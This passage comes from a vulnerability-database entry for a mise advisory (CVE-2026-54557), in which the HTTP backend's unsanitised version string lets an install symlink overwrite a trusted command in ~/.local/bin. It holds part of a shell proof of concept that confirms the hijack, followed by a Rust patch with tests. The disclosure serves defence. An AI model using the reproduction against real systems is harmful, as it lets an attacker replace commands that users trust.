MISE_CACHE_DIR=\"$CASE_CACHE\" \\\n    MISE_STATE_DIR=\"$CASE_STATE\" \\\n    MISE_CONFIG_DIR=\"$CASE_CONFIG\" \\\n    MISE_YES=1 \\\n    mise install --yes\n  )\n\n  CHAIN_MARKER=\"$CASE_MARKER\" \\\n  PATH=\"$HOME_DIR/.local/bin:$PATH\" \\\n  trustedcmd\n\n  observed=\"$(cat \"$CASE_MARKER\")\"\n  if [ \"$observed\" != \"$expected\" ]; then\n    echo \"FAIL: $case_name expected $expected but saw $observed\" \u003e\u00262\n    exit 1\n  fi\n\n  if [ \"$case_name\" = \"path-chain-vulnerable\" ] \u0026\u0026 [ ! -L \"$HOME_DIR/.local/bin/trustedcmd\" ]; then\n    echo \"FAIL: path-chain case did not replace trustedcmd with a symlink\" \u003e\u00262\n    exit 1\n  fi\n}\n\nrun_path_chain_case path-chain-vulnerable \"__HOME_LOCAL_PREFIX__\" ATTACKER_CONTROLLED_TRUSTED_COMMAND\nrun_path_chain_case path-chain-control \"1.0.0\" SAFE_PREEXISTING_TRUSTED_COMMAND\n\necho \"PATH_CHAIN_CONFIRMED\"\n```\n\nExpected vulnerable markers:\n\n```text\nVULNERABLE_BEHAVIOR_CONFIRMED\nPATH_CHAIN_CONFIRMED\n```\n\n## Candidate Fix\n\nUse `tv.tv_pathname()` for non-latest HTTP install symlink names, preserving the current content-addressed behavior for `latest` or empty versions.\n\n```diff\ndiff --git a/src/backend/http.rs b/src/backend/http.rs\nindex 4e4e972..18cf8a1 100644\n--- a/src/backend/http.rs\n+++ b/src/backend/http.rs\n@@ -518,12 +518,12 @@ impl HttpBackend {\n\n         // Determine version name for install path\n         let version_name = if tv.version == \"latest\" || tv.version.is_empty() {\n-            \u0026cache_key[..7.min(cache_key.len())] // Content-based versioning\n+            cache_key[..7.min(cache_key.len())].to_string() // Content-based versioning\n         } else {\n-            \u0026tv.version\n+            tv.tv_pathname()\n         };\n\n-        let install_path = tv.ba().installs_path.join(version_name);\n+        let install_path = tv.ba().installs_path.join(\u0026version_name);\n\n         // Clean up existing install\n         if install_path.exists() {\n@@ -839,3 +839,51 @@ impl Backend for HttpBackend {\n         }\n     }\n }\n+\n+#[cfg(test)]\n+mod tests {\n+    use super::*;\n+    use crate::cli::args::{BackendArg, BackendResolution};\n+    use crate::toolset::{ToolRequest, ToolSource, ToolVersionOptions};\n+\n+    fn http_test_tv(version: \u0026str) -\u003e ToolVersion {\n+        let backend = Arc::new(BackendArg::new_raw(\n+            \"http-absolute-version\".to_string(),\n+            Some(\"http:absolute-version\".to_string()),\n+            \"absolute-version\".to_string(),\n+            None,\n+            BackendResolution::new(true),\n+        ));\n+        let request = ToolRequest::Version {\n+            backend,\n+            version: version.to_string(),\n+            options: ToolVersionOptions::default(),\n+            source: ToolSource::Argument,\n+        };\n+        ToolVersion::new(request, version.to_string())\n+    }\n+\n+    #[test]\n+    fn install_symlink_path_uses_sanitized_version_pathname() {\n+        let tv = http_test_tv(\"/outside-root/mise-http-version-out/selected-prefix\");\n+\n+        assert_eq!(\n+            tv.tv_pathname(),\n+            \"-outside-root-mise-http-version-out-selected-prefix\"\n+        );\n+        assert!(!Path::new(\u0026tv.tv_pathname()).is_absolute());\n+    }\n+\n+    #[test]\n+    fn latest_install_symlink_still_uses_content_version() {\n+        let tv = http_test_tv(\"latest\");\n+        let cache_key = \"abcdef123456\";\n+        let version_name = if tv.version == \"latest\" || tv.version.is_empty() {\n+            cache_key[..7.min(cache_key.len())].to_string()\n+        } else {\n+            tv.tv_pathname()\n+        };\n+\n+        assert_eq!(version_name, \"abcdef1\");\n+    }\n+}\n```\n\nReporter: JUNYI LIU",
  "id": "GHSA-f94h-j2qg-fxw3",
  "modified": "2026-06-23T18:13:53Z",
  "published": "2026-06-23T18:13:53Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/jdx/mise/security/advisories/GHSA-f94h-j2qg-fxw3"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/jdx/mise"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "mise HTTP backend uses raw version path for install symlink destination"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-54557 (GCVE-0-2026-54557)

GHSA-F94H-J2QG-FXW3

Summary

Affected Code

Impact

Why This Crosses A Boundary

Reproduction

Candidate Fix

Tags

Sightings

Nomenclature